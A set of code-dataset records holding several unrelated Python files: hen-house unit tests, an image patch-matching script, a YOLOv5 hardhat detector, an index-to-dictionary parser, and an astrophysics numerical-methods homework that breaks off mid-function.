self.assertEqual(self.hen_house._productivity_index(), 0.25)\n with patch(\"hen_class.HenHouse.season\", \"spring\"):\n self.assertEqual(self.hen_house._productivity_index(), 0.75)\n with patch(\"hen_class.HenHouse.season\", \"summer\"):\n self.assertEqual(self.hen_house._productivity_index(), 1)\n with patch(\"hen_class.HenHouse.season\", \"autumn\"):\n self.assertEqual(self.hen_house._productivity_index(), 0.5)\n\n def test_productivity_index_incorrect_season(self):\n # mock the season method return with some incorrect season\n # make sure ErrorTimesOfYear is raised when _productivity_index called\n with patch(\"hen_class.HenHouse.season\", \"\"):\n with self.assertRaises(ErrorTimesOfYear):\n self.hen_house._productivity_index()\n\n def test_get_eggs_daily_in_winter(self):\n # test get_eggs_daily function\n # _productivity_index method or season should be mocked\n with patch(\"hen_class.HenHouse._productivity_index\", return_value=0.25):\n self.assertEqual(self.hen_house.get_eggs_daily(10), 2)\n\n def test_get_max_count_for_soup(self):\n # call get_max_count_for_soup with expected_eggs number and check that correct number is returned\n\n # Note: make sure to mock _productivity_index or season\n # in order not to call datetime.datetime.today().month, since it is going to be dynamic value in the future\n with patch(\"hen_class.HenHouse.season\", \"winter\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(1), 4)\n with patch(\"hen_class.HenHouse.season\", \"spring\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(5), 2)\n with patch(\"hen_class.HenHouse.season\", \"summer\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(8), 2)\n with patch(\"hen_class.HenHouse.season\", \"autumn\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(3), 4)\n\n def test_get_max_count_for_soup_returns_zero(self):\n # call get_max_count_for_soup with expected_eggs number bigger than get_eggs_daily(self.hen_count)\n # zero should be returned.\n\n # Note: make sure to mock _productivity_index or season\n # in order not to call datetime.datetime.today().month, since it is going to be dynamic value in the future\n with patch(\"hen_class.HenHouse._productivity_index\", return_value=0.5):\n self.assertEqual(self.hen_house.get_max_count_for_soup(10), 0)\n\n def test_food_price(self):\n # mock requests.get and make the result has status_code attr 200 and text to some needed value\n # make sure food-price() return will be of int type\n with patch(\"hen_class.requests.get\") as mocked_request:\n mocked_request.return_value.status_code = 200\n mocked_request.return_value.text = \"6543513511212\"\n self.assertEqual(self.hen_house.food_price(), 2)\n self.assertIsInstance(self.hen_house.food_price(), int)\n\n def test_food_price_connection_error(self):\n # mock requests.get and make the result has status_code attr not 200\n # check that ConnectionError is raised when food_price method called\n with patch(\"hen_class.requests.get\") as mocked_request:\n mocked_request.return_value.status_code = 404\n with self.assertRaises(ConnectionError):\n self.hen_house.food_price()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"homework_completed/HW#4 Tests Practice/test_hen_class.py","file_name":"test_hen_class.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"569070102","text":"import collections\nimport numpy as np\nimport cv2 \nfrom functools import reduce\nfrom sklearn.feature_extraction.image import extract_patches_2d\nimport warnings\nwarnings.filterwarnings('ignore')\nimport math\nfrom math import sqrt\nimport json\nfrom ast import literal_eval\n\n#import NeighboursFile\n#import Adaptive_parition\n\n############## Pre-processing #################\noriginal_img='U.jpeg'\nexample_img='v.png'\n#example_img='V.jpeg'\n\no_img = cv2.imread(original_img)\nclone_u = o_img.copy()\ne_img =\tcv2.imread(example_img)\nimg_yuv_U = cv2.cvtColor(o_img, cv2.COLOR_BGR2YUV)\nimg_yuv_V = cv2.cvtColor(e_img, cv2.COLOR_BGR2YUV)\n\ny, u, v = cv2.split(img_yuv_U)\ny2, u2, v2 = cv2.split(img_yuv_V)\n\ndum_V = y2\ndum_U= y \n\nimage_matrix=y\nstyle_matrix=y2\n\n# CHANGED : image size may not be square, hence separate out of bounds check\nimg_size_rows=y.shape[0]\nimg_size_columns=y.shape[1]\n\n# CHANGED : style size may not be square, hence separate out of bounds check\nstyle_size_rows=y.shape[0]\nstyle_size_columns=y.shape[1]\n\n\n\n#labels=Adaptive_parition.lb\n\ndl = json.load(open(\"labels.txt\"))\n#labels=list(itertools.chain(*dl.values()))\nlabels=dl\n\ndn=json.load(open('Neighbours_dict_text.txt'))\nneighbour_dict=dn\n#neighbour_dict=NeighboursFile.Neighbours_dict\nprint(\"label_dict: \",len(labels))\nprint(\"neighbour_dict\",len(neighbour_dict))\nprint(\"\\n\")\n\n#################### Main snippet Program ########################\n\n# global labels={region:[10 labels]}, neighbour_dict={region1:[neighbour1, ... ], region2 : ...., ... }), \n# binaries={ {[patch1, patch2] : {[label1, label2] : norm, .. }, ... } }\n\nimport numpy as np\nimport cv2\n#global labels, neighbour_dict, img_size, image_matrix, style_matrixTypeError: unhashable type: 'list'\n\n\ndef l2_norm_unary (patch1, patch2) :\n\tpatch1=literal_eval(patch1)\n\tpatch_matrix1=np.split(image_matrix,[patch1[0][0],patch1[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix1=np.split(patch_matrix1,[patch1[0][1],patch1[1][1]],axis=1)[1] ##Y-axis\n\tpatch_matrix2=np.split(style_matrix,[patch2[0][0],patch2[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix2=np.split(patch_matrix2,[patch2[0][1],patch2[1][1]],axis=1)[1] ##Y-axis\n\tnorm_val = np.sum((patch_matrix1-patch_matrix2)**2)/(patch_matrix1.shape[0]**2)\n\t#print('norm_val : ',norm_val)\n\treturn norm_val\n\ndef l2_norm_binary (patch1, patch2) :\n\tprint('l2_norm_binary ....\\n')\n\tprint('image shape: ', image_matrix.shape,' style shape: ', style_matrix.shape)\n\tprint('patch1, patch2 : ',patch1,patch2)\n\tprint(\"\\n\")\n\t# CHANGED : image_matrix to style_matrix\n\tpatch_matrix1=np.split(style_matrix,[patch1[0][0],patch1[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix1=np.split(patch_matrix1,[patch1[0][1],patch1[1][1]],axis=1)[1] ##Y-axis\n\n\tpatch_matrix2=np.split(style_matrix,[patch2[0][0],patch2[1][0]],axis=0)[1] ##X-axis\n\tpatch_matrix2=np.split(patch_matrix2,[patch2[0][1],patch2[1][1]],axis=1)[1] ##Y-axis\n\tprint('patch_matrix1 - patch_matrix2 Shapes : ',patch_matrix1.shape, patch_matrix2.shape)\n\tprint(\"\\n\\n\")\n\tnorm_val = np.sum((patch_matrix1-patch_matrix2)**2)/(patch_matrix1.shape[0]**2)\n\treturn norm_val\n \n\ndef extended_label(label, extension) :\n\tlabel = np.asarray(label)\n\textension = np.asarray(extension)\n\n\t# CHANGED : extension to be done only wrt vertex1 of label; Out of bounds check added\n\tshaded = extension+label[0]\n\tif shaded[1][0]>style_size_rows-1 or shaded[1][1]>style_size_columns-1 :\n\t\treturn None\n\tif shaded[0][0]<0 or shaded[0][1]<0 :\n\t\treturn None\n\t\n\treturn list(shaded)\n\n\ndef binary_pots(reg1, reg2, extension1, extension2):\n\tprint('binary_pots ....\\n')\n\tdict_label_potentials = {}\n\tfor label1 in labels[str(reg1)] :\n\t\tfor label2 in labels[str(reg2)] :\n\t\t\tpatch1 = extended_label(label1, extension1)\n\t\t\tpatch2 = extended_label(label2, extension2)\n\t\t\tprint(\"patch1, patch2 : \",patch1, patch2)\n\t\t\tif patch1 is None or patch2 is None :\n\t\t\t\tdict_label_potentials[str([label1,label2])] = None\n\t\t\telse :\n\t\t\t\tdict_label_potentials[str([label1,label2])] = l2_norm_binary(patch1, patch2)\n\t\t\tprint(\"---------------------------\\n\")\n\treturn dict_label_potentials\n\n\ndef calculate_unaries(labels_dict):\n\t# store as dict(), dict1 = {region[i]:{label[j]: unary, ...}}\n\tunaries = {}\n\tfor partition in labels_dict :\n\t\tfor label in labels_dict[partition] :\n\t\t\tif partition not in unaries :\n\t\t\t\tunaries[partition] = {}\n\t\t\tunaries[partition][str(label)]= l2_norm_unary(partition, label)\n\treturn unaries\n\ndef extend_region(patch):\n\t# check for out of bounds\n\tver1, ver3 = patch\n\tTi = ver3[0]-ver1[0]\n\tTi_2 = int(Ti/2)\n\n\t# Check if index is less than side-1 (subtract as index starts at 0), set to 0.\n\tif ver1[0] img_size_rows-1 :\n\t extended_x2 = img_size_rows-1\n\telse :\n\t extended_x2 = ver3[0]+(Ti_2)\n\n\tif ver3[1]+Ti_2 > img_size_columns-1 :\n\t extended_y2 = img_size_columns-1\n\telse :\n\t extended_y2 = ver3[1]+(Ti_2)\n\n\treturn [extended_x1,extended_y1],[extended_x2,extended_y2]\n\ndef find_intersection_region(reg1, reg2) :\n\t# Which corner is inside the other squre. Do for both.\n\t# One region's x & y coordinates which lie within the other regions xs and ys.\n\t#final_x1,final_x2,final_y1,final_y2\n\treg1_ver1, reg1_ver2 = reg1\n\treg1_x1, reg1_x2 = reg1_ver1[0],reg1_ver2[0]\n\treg1_y1, reg1_y2 = reg1_ver1[1],reg1_ver2[1]\n\treg2_ver1, reg2_ver2 = reg2\n\treg2_x1, reg2_x2 = reg2_ver1[0],reg2_ver2[0]\n\treg2_y1, reg2_y2 = reg2_ver1[1],reg2_ver2[1]\n\t# check if reg1 in reg2\n\tif reg1_x1 in range(reg2_x1, reg2_x2+1) :\n\t\tfinal_x1 = reg1_x1 \n\tif reg1_x2 in range(reg2_x1, reg2_x2+1) :\n\t\tfinal_x2 = reg1_x2\n\tif reg1_y1 in range(reg2_y1, reg2_y2+1) :\n\t\tfinal_y1 = reg1_y1 \n\tif reg1_y2 in range(reg2_y1, reg2_y2+1) :\n\t\tfinal_y2 = reg1_y2\n\t# check if reg2 in reg1 \n\tif reg2_x1 in range(reg1_x1, reg1_x2+1) :\n\t\tfinal_x1 = reg2_x1 \n\tif reg2_x2 in range(reg1_x1, reg1_x2+1) :\n\t\tfinal_x2 = reg2_x2 \n\tif reg2_y1 in range(reg1_y1, reg1_y2+1) :\n\t\tfinal_y1 = reg2_y1 \n\tif reg2_y2 in range(reg1_y1, reg1_y2+1) :\n\t\tfinal_y2 = reg2_y2\n\tprint('find_intersection_region Final Matrix : ',[final_x1,final_y1],[final_x2,final_y2])\n\treturn [final_x1,final_y1],[final_x2,final_y2]\n\ndef transform_wrt_origin(points, origin):\n\torigin = np.asarray(origin)\n\tpoints = np.asarray(points)\n\ttransformed_points=(list(points - origin))\n\n\treturn transformed_points\n\ndef calculate_binaries():\n\t#for each pair findIntersection\n\tbinaries = {}\n\tfor region in neighbour_dict :\n\t\treg1 = literal_eval(region)\n\t\tprint('reg1',reg1)\n\t\textended_reg1 = extend_region(reg1)\n\t\tprint('extended_reg1 : ',extended_reg1)\n\t\torigin1 = reg1[0]\n\t\tfor neighbour in neighbour_dict[region] :\n\t\t\treg2 = neighbour\n\t\t\tprint(\"reg2: \",reg2)\n\t\t\torigin2 = reg2[0]\n\t\t\t#extend region & neighbour. Handle edge cases\n\t\t\textended_reg2 = extend_region(reg2)\n\t\t\tprint('extended_reg2 : ',extended_reg2)\n\t\t\tprint(\"\\n\\n\")\n\t\t\tintersection = find_intersection_region(extended_reg1, extended_reg2)\n\t\t\ttransformed_intersection_o1 = transform_wrt_origin(intersection, origin1)\n\t\t\ttransformed_intersection_o2 = transform_wrt_origin(intersection, origin2)\n\t\t\t# dict2 = {[reg1,reg2] : {[label1x, label2y] : pair_pot, ... } ... }\n\t\t\tprint('transformed_intersection_o1 : ',transformed_intersection_o1)\n\t\t\tprint('transformed_intersection_o2 : ',transformed_intersection_o2)\n\t\t\tprint(\"\\n\")\n\t\t\tbinaries[str([reg1,reg2])]= binary_pots(reg1, reg2, transformed_intersection_o1, transformed_intersection_o2)\n\treturn binaries\n\n\n#### Calling Function:\nunary_dict = calculate_unaries(labels)\nprint(\"Unary Potentials completed...\")\nprint(\"\\n########################################\\n\")\n# CHANGED : IMPORTANT NOTE - Certain label pairs of regions may be NONE because of out of bounds issue. Disregard them.\nbinary_dict = calculate_binaries()\nprint(\"\\n########################################\\n\")\n","sub_path":"Split_and_Match/potentials_Modified_new.py","file_name":"potentials_Modified_new.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"589407057","text":"import argparse\nimport os\nimport platform\nimport shutil\nimport time\nfrom pathlib import Path\n\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\n\nfrom core.models.experimental import attempt_load\nfrom core.utils.datasets import LoadStreams, LoadImages\nfrom core.utils.general import non_max_suppression, scale_coords, xyxy2xywh, plot_one_box, letterbox\nfrom core.utils.torch_utils import select_device, time_synchronized\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Hardhat_detection_yolov5():\n def __init__(self, view, draw):\n if torch.cuda.is_available():\n device_type = 'cuda:0'\n else:\n device_type = 'cpu'\n\n print('Using device:', device_type)\n self.device = select_device(device_type)\n self.view = view\n self.draw = draw\n\n # Load self.model\n weights = '../../models/best.pt'\n self.model = attempt_load(weights, map_location=self.device) # load FP32 self.model\n \n # Get self.names and self.colors\n self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names\n\n # Set constant variables\n self.imgsz = 640\n\n self.conf_thres = 0.4\n self.iou_thres = 0.5\n self.classes = None\n self.agnostic_nms = True\n self.colors = [[0,0,255], [255,255,255], [255, 255, 0], [255,0,0], [210,105,30]]\n # names: ['blue', 'white', 'yellow', 'red', 'none']\n\n\n def predict(self, img_ori):\n # Run inference\n \n img = letterbox(img_ori, new_shape=self.imgsz)[0]\n \n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n # img = img.transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n \n img = torch.from_numpy(img).to(self.device)\n img = img / 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n \n # Inference\n t1 = time_synchronized()\n with torch.no_grad():\n pred = self.model(img, augment=True)[0]\n\n t2 = time_synchronized()\n print(f'Model inference FPS: {1 / (t2 - t1)}')\n \n # Apply NMS\n pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=self.agnostic_nms)\n\n bboxes_xyx2y2 = []\n labels = []\n # Process detections\n for i, det in enumerate(pred): # detections per image\n # gn = torch.tensor(img_ori.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img_ori.shape).round()\n \n # Write results\n for *xyxy, conf, cls in reversed(det):\n # xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh\n bboxes_xyx2y2.append([int(coord) for coord in xyxy])\n labels.append(self.names[int(cls)])\n\n if self.draw: # Add bbox to image\n label = '%s %.2f' % (self.names[int(cls)], conf)\n plot_one_box(xyxy, img_ori, label=label, color=self.colors[int(cls)], line_thickness=3)\n\n # Stream results\n if self.view:\n plt.figure(figsize=(15, 15))\n plt.imshow(img_ori[:, :, [2, 1, 0]])\n plt.show()\n\n return bboxes_xyx2y2, labels, img_ori\n\n return bboxes_xyx2y2, labels, img_ori\n\n\n# hardhat_detector = Hardhat_detection_yolov5()\n#\n# source_img_path = '../data/00000.jpg'\n# img_ori = cv2.imread(source_img_path)\n# with torch.no_grad():\n# t1 = time_synchronized()\n# det, gn = hardhat_detector.predict(img_ori)\n# t2 = time_synchronized()\n# print(f'FPS: {round((t2 - t1), 3)}')\n#\n","sub_path":"src/core/HardHat_detection_yolov5.py","file_name":"HardHat_detection_yolov5.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597436229","text":"#coding:utf-8\n\nimport sys\nimport re\n\nopenbrack=r'[〔]'\nclosebrack=r'[〕]'\n\ndef isCloseOnly(line): # 閉じカッコだけ存在する行ならtrue\n if re.search(openbrack,line)==None and re.search(closebrack,line):\n return True\n return False\n\ndef isDigitRow(line): # 索引ページ番号のみの行ならtrue\n if line.isdigit():\n return True\n tmps=re.split(r'[,,]',line)\n for tmp in tmps:\n tmp=re.sub(\" \",\"\",tmp)\n if not tmp.isdigit():\n return False\n return True\n\ndef isInfoRow(line): # ページ、インデックス、空白行ならtrue\n if line==\"\\n\" or line.startswith(\"-\") or line.startswith(\"【\") or line==\"\" or \"和英索引\" in line or \"英和索引\" in line:\n return True\n return False\n\ndef parse(filename):\n lines=[]\n with open(filename,\"r\")as f:\n tmpline=\"\"\n arc_brack_open_z=0 #(\n arc_brack_close_z=0 # )\n arc_brack_open_h=0 # (\n arc_brack_close_h=0 # )\n shell_brack_open=0 #〔\n shell_brack_close=0 # 〕\n for line in f.readlines():\n line=line.strip()\n if isInfoRow(line) or isDigitRow(line):\n continue\n arc_brack_open_z+=line.count(\"(\")\n arc_brack_close_z+=line.count(\")\")\n arc_brack_open_h+=line.count(\"(\")\n arc_brack_close_h+=line.count(\")\")\n shell_brack_open+=line.count(\"〔\")\n shell_brack_close+=line.count(\"〕\")\n\n if arc_brack_open_h==arc_brack_close_h and arc_brack_open_z==arc_brack_close_z and shell_brack_open==shell_brack_close:\n line=tmpline+line\n arc_brack_open_z=0\n arc_brack_close_z=0\n arc_brack_open_h=0\n arc_brack_close_h=0\n shell_brack_open=0\n shell_brack_close=0\n tmpline=\"\"\n #print(line)\n lines.append(line)\n else:\n tmpline+=line\n continue\n return lines\n \ndef remove_brack(lines):\n outlines=[]\n for line in lines:\n arc_z_pos=line.find(\"(\")\n arc_h_pos=line.find(\"(\")\n shell_pos=line.find(\"〔\")\n if arc_z_pos==-1:arc_z_pos=999\n if arc_h_pos==-1:arc_h_pos=999\n if shell_pos==-1:shell_pos=999\n \n pos=min(arc_z_pos,arc_h_pos,shell_pos)\n outlines.append(line[0:pos])\n return outlines\n \ndef remove_index(lines):\n outlines=[]\n for line in lines:\n spllines=line.split(\" \")\n for splline in spllines:\n if isDigitRow(splline):\n spllines.remove(splline)\n outlines.append(\"\".join(spllines))\n return outlines\n\nif __name__==\"__main__\":\n args=sys.argv\n lines=parse(args[1])\n lines=remove_brack(lines)\n lines=remove_index(lines)\n\n with open(\"worddic/AIdic.txt\",\"w\") as f:\n for line in lines:\n f.write(line+\"\\n\")\n","sub_path":"encycloindex2worddic.py","file_name":"encycloindex2worddic.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203538804","text":"\"\"\"\n@author: christopher seay\n sid: s2286181\n email: seay@strw.leidenuniv.nl\n\n@course: numerical recipes in astrophysics\n@instructor: van daalen, m.p.\n\ncoding structure:\n labels are inside 'problem' function calls. for example, problem_1(case)\n has a comment that specifies its use is for problem 1a.\n procedural programming approach was used here.\n\nTODO: after writing the whole damn thing, don't forget to write to a pdf\n\"\"\"\n\nimport numpy as np\nimport sys\nfrom astropy.table import Table\nimport matplotlib\nmatplotlib.use(\"Agg\") # non-interactive\nimport matplotlib.pyplot as plt\n\ndef random_number_generator(seed):\n \"\"\"generate random number between [0,1).\n\n uses XOR 64 bit shift, mwc, and mlcg methods\n to generate a pseudorandom number. multiple\n methods are used to minimize correlation.\n\n args:\n seed: initial seed\n\n returns:\n I_j: random float [0,1)\n seed: 'new' seed to continue random number generation\n\n \"\"\"\n\n # random int constants to generate random numbers\n a1 = 21\n a2 = 35\n a3 = 4\n a4 = 182937572\n m = 2**64-1\n m2 = 2**32-1\n a = 9824192\n c = 1223536\n bit64 = 0xffffffffffffffff # 64-bit mask to limit memory use\n\n # initialize I_j with given seed\n # this seed is newly set after each call\n # start off with a bit of 64-bit XOR-shift\n I_j = seed ^ (seed >> a1) & bit64\n I_j = I_j ^ (I_j << a2)\n I_j = I_j ^ (I_j >> a3)\n\n # mclg\n I_j = (a*I_j + c) % m\n\n # mwc\n I_j = a4*(I_j & m2) + (I_j >> 32)\n\n # xor-shift again\n I_j = I_j ^ (I_j >> a1)\n I_j = I_j ^ (I_j << a2)\n I_j = I_j ^ (I_j >> a3)\n\n # mwc again\n I_j = a4*(I_j & m2) + (I_j >> 32)\n\n # finish with mlcg\n # divid by the period to get [0,1)\n I_j = (a*I_j + c) % m\n seed = I_j # set new \"seed\" for next iteration\n I_j = np.float64(I_j)/m # convert I_j from int to 64-bit float\n\n return I_j, seed\n\ndef calc_factorial(n):\n \"\"\"return n! (factorial of n).\n\n returns factorial of a real-valued integer n. for problem 1a.\n\n TODO: memory overflow error for large int values (e.g, 201).\n gamma function for non-integer real numbers.\n\n args:\n n: integer\n\n returns:\n n!\n\n \"\"\"\n\n if n < 0 or type(n) is float:\n raise ValueError('use only real-valued integers for k.')\n\n # for n usually not within memory limits\n if n > 101:\n result = np.log10(1)\n for i in range(2,n+1):\n result += np.log10(i)\n\n return np.float64(result)\n\n # for n within memory limits\n result = 1\n for i in range(2, n + 1):\n result *= i\n\n return np.float64(result)\n\ndef calc_derivative(function,x,step=1e-6):\n \"\"\"central difference method of differentiation.\n\n we compute the derivative numerically using the central difference method.\n step = 1e-6 seems to work very well after a bit of testing.\n if 1e-12 error is desirable, 1e-6 is achieved, which is sqrt(err).\n\n args:\n function: function to be differentiated\n x: maximum x-range; 5 for this assignment\n step: sufficiently small non-zero value to avoid machine error\n\n returns:\n derivative of function\n\n \"\"\"\n\n fn = function\n h = step\n dx = (fn(x+h)-fn(x-h))/(2*h)\n return dx\n\ndef romberg_integral(function,lower_bound,upper_bound,steps):\n \"\"\"romberg integration calculator.\n\n using the romberg integration algorithm (which uses the\n trapezoidal, extended trapezoidal, and richardson extrapolation)\n to calculate the integral of a function. creates a table of calculation\n guesses for the integrand, theoretically getting progressively\n closer to the real result. unless the integrand is impressively complex,\n steps param should be between 2-6.\n\n args:\n function: function to be integrated\n lower_bound: lower-bound of integrand\n upper_bound: upper-bound of integrand\n steps: number of romberg splits\n\n returns:\n table[-1,-1]: integrated function value\n\n \"\"\"\n\n # shorthand the verbose function input\n fn = function\n a = lower_bound\n b = upper_bound\n\n table = np.zeros((steps, steps), dtype=np.float64)\n pow_4 = 4 ** np.arange(steps, dtype=np.float64) - 1\n\n # trapezoidal rule\n h = (b - a)\n table[0, 0] = h * (fn(a) + fn(b)) / 2\n\n for j in range(1, steps):\n h /= 2\n\n # extended trapezoidal rule\n table[j, 0] = table[j - 1, 0] / 2\n table[j, 0] += h * np.sum(\n fn(a + i * h) for i in range(1, 2 ** j + 1, 2)\n )\n\n # richardson extrapolation\n for k in range(1, j + 1):\n table[j, k] = table[j, k - 1] + \\\n (table[j, k - 1] - table[j - 1, k - 1]) / pow_4[k]\n\n return table[-1,-1]\n\ndef calc_integral(function,lower_bound,upper_bound,steps):\n \"\"\"midpoint integrator for improper integrals.\n\n unfortunately, my romberg integrator doesn't work because the integrand\n doesn't play nice at xmin = 0, so this integrator will do. i'm keeping it\n in the code, however.\n\n args:\n function: function to be integrated\n lower_bound: lower-bound of integrand\n upper_bound: upper-bound of integrand\n steps: number of romberg splits\n\n return:\n integrated value\n\n \"\"\"\n\n # shorthand the verbose function input\n fn = function\n a = lower_bound\n b = upper_bound\n h = float(b - a)/steps\n i = 0 # integrand\n\n for j in range(steps):\n i += fn((a+h/2.0)+j*h)\n i *= h # final area\n\n return i\n\n\ndef calc_roots(f,a,b,tol,root):\n \"\"\"find roots of a given function.\n\n uses bisection method to calculate roots of the given function.\n note: for this assignment, the bounds are actually x = [0,5) but\n bisection does not work if a value is exactly 0, so a << 1 instead.\n\n args:\n f: function to find root of\n a: lower bound of bracket\n b: upper bound of bracket\n tol: precision tolerance for root (e.g, 1e-8)\n\n returns:\n c: f(c) = 0\n \"\"\"\n\n # brackets\n xl = a\n xr = b\n while np.abs(xl-xr) >= tol:\n c = (xl+xr)/2 # midpoint of bracket\n prod = f(xl)*f(c)\n if prod > root:\n xl = c\n else:\n if prod < root:\n xr = c\n return c\n\ndef calc_quantile(sl,quant):\n \"\"\"calculate quantiles from a sorted list.\n\n extremely simple algorithm that requires list to be sorted. roughly\n calculates desired quantile\n\n \"\"\"\n if quant == 0 or quant > 99:\n raise ValueError('percentiles range from 1-99.')\n q = quant - 1 # counting starts at 0\n quantile = sl[q]\n return np.float64(quantile)\n\ndef calc_average_number_of_satallites_per_bin(bin_vals,bins,nhalos):\n \"\"\"calculate the average number of satellites in a histogram bin.\n\n\n Divide bin values by width of bins, then by number of haloes used to create it\n Gives average number of satallies per bin\n \"\"\"\n\n avgs = np.zeros(len(bin_vals))\n\n # need to count and inspect particular indices, so we use enumerate\n # divide each element bin by the total number of halos to get an avg\n # number of satellites per halo first, then take out of log-log space\n # by dividing by the bin width\n for i, sat in enumerate(bin_vals):\n avg = sat/nhalos\n norm_avg = avg/(bins[i + 1] - bins[i])\n avgs[i] = norm_avg\n return avgs\n\ndef poisson_dist(w,n):\n \"\"\"calculates poisson distribution given by: P_w(k) = [w^k * e^(-w)] / k!\n\n given a w, k outputs a poisson probability P_w(k). for problem 1a.\n\n args:\n w: expected value of discrete random variable k.\n k: 0, 1, 2,...\n\n returns:\n P_w: poisson probability value\n\n TODO: be able to output (101,200) overflow issue\n\n \"\"\"\n k = calc_factorial(n)\n P_w = ((w**n)*(np.exp(-w))/k)\n return np.float64(P_w)\n\ndef interp1d_spline(x,xp,fp):\n \"\"\"1D spline interplator.\n\n curve fitting using linear polynomials to construct data points within\n specified range of discrete known data points.\n\n chosen for 2b because my 1D linear interpolator wasn't working.\n\n TODO: used an online guide for this but it's still not working. using\n a python library instead (numpy.interp(x,xp,fp))\n \"\"\"\n\n size = len(xp)\n\n xpdiff = np.diff(xp)\n fpdiff = np.diff(fp)\n\n # allocate buffer matrices\n Li = np.zeros(size)\n Li_1 = np.zeros(size-1)\n z = np.zeros(size)\n\n # fill diagonals Li and Li-1 and solve [L][y] = [B]\n Li[0] = np.sqrt(2*xpdiff[0])\n Li_1[0] = 0.0\n B0 = 0.0 # natural boundary\n z[0] = B0 / Li[0]\n\n for i in range(1, size-1, 1):\n Li_1[i] = xpdiff[i-1] / Li[i-1]\n Li[i] = np.sqrt(2*(xpdiff[i-1]+xpdiff[i]) - Li_1[i-1] * Li_1[i-1])\n Bi = 6*(fpdiff[i]/xpdiff[i] - fpdiff[i-1]/xpdiff[i-1])\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\n\n i = size - 1\n Li_1[i-1] = xpdiff[-1] / Li[i-1]\n Li[i] = np.sqrt(2*xpdiff[-1] - Li_1[i-1] * Li_1[i-1])\n Bi = 0.0 # natural boundary\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\n\n # solve [L.T][x] = [y]\n i = size-1\n z[i] = z[i] / Li[i]\n for i in range(size-2, -1, -1):\n z[i] = (z[i] - Li_1[i-1]*z[i+1])/Li[i]\n\n # find index\n index = x.searchsorted(x)\n np.clip(index, 1, size-1, index)\n\n xi1, xi0 = xp[index],xp[index-1]\n yi1, yi0 = fp[index],fp[index-1]\n zi1, zi0 = z[index],z[index-1]\n hi1 = xi1 - xi0\n\n # calculate cubic\n f0 = zi0/(6*hi1)*(xi1-x)**3 + \\\n zi1/(6*hi1)*(x-xi0)**3 + \\\n (yi1/hi1 - zi1*hi1/6)*(x-xi0) + \\\n (yi0/hi1 - zi0*hi1/6)*(xi1-x)\n return f0\n\n# def linear_interp_3D():\n# \"\"\"linearly interpolate for a given 3D function.\n#\n# \"\"\"\n#\n# continue\n\n# quicksort\ndef partition(xs, start, end):\n follower = leader = start\n while leader < end:\n if xs[leader] <= xs[end]:\n xs[follower], xs[leader] = xs[leader], xs[follower]\n follower += 1\n leader += 1\n xs[follower], xs[end] = xs[end], xs[follower]\n return follower\n\ndef _quicksort(xs, start, end):\n if start >= end:\n return\n p = partition(xs, start, end)\n _quicksort(xs, start, p-1)\n _quicksort(xs, p+1, end)\n\ndef quicksort(xs):\n _quicksort(xs, 0, len(xs)-1)\n# end quicksort\n\ndef random_sampling(function,xmin,xmax,ymin,ymax,sample_size,seed):\n \"\"\"random sample distribution using rejection sampling.\n\n\n creates a random sampling distribution from desired function\n with set size. utilizes rejection sampling to find valid points.\n for this assignment, sample_x will serve as radii, with sample_y the\n output of n(r). this is essentially junk data, but this sampling\n algorithm may be used in the future.\n\n TODO: had a slice sampling procedure but couldn't figure out\n the inverse function. not sure if there is one. i couldn't tell\n from the horizontal line test using w-alpha\n\n args:\n function: function to be sampled from\n xmin: minimum in range of possible x-values\n xmax: maximum in range of possible x-values\n ymin: maximum in range of possible y-values\n ymax: maximum in range of possible y-values\n sample_size: desired number of sample points in distribution\n\n returns:\n sample_x:\n sample_y:\n\n \"\"\"\n # fn = function\n # fn_inv = inv_function # actual inverse goes here\n # samples = np.zeros(iter)\n # x = 0\n # for i in range(iter):\n # u = rand(0, fn(x))\n # x_lo, x_hi = fn_inv(u)\n # x = rand(x_lo, x_hi)\n # samples[i] = x\n\n # return samples\n\n rand = random_number_generator # function alias\n\n fn = function\n sample_x = np.zeros(sample_size)\n sample_y = np.zeros(sample_size)\n samples = 0 # initializes size of accepted sample points\n while samples < sample_size:\n x,seed = rand(seed)\n y,seed = rand(seed) # get next random number\n sx = (xmax-xmin)*x+xmin\n sy = (ymax-ymin)*y+ymin\n\n if sy <= fn(sx):\n sample_x[samples] = sx\n sample_y[samples] = sy\n samples += 1\n\n return sample_x, sample_y\n\ndef generate_satellite_profile(f,nsats,seed):\n \"\"\"rejection sampler to generate 3D positions (r,theta,phi) of satellites.\n\n generates a 3D profile for satellites using a rejection sampler for the\n radial component and a random number generator for the polar,\n azimuthal components (theta, phi respectively).\n\n args:\n f: function to be used\n nsats: number of satellite galaxies\n seed: random seed\n\n returns:\n r,t,p 3D position for satellite\n\n \"\"\"\n\n rand = 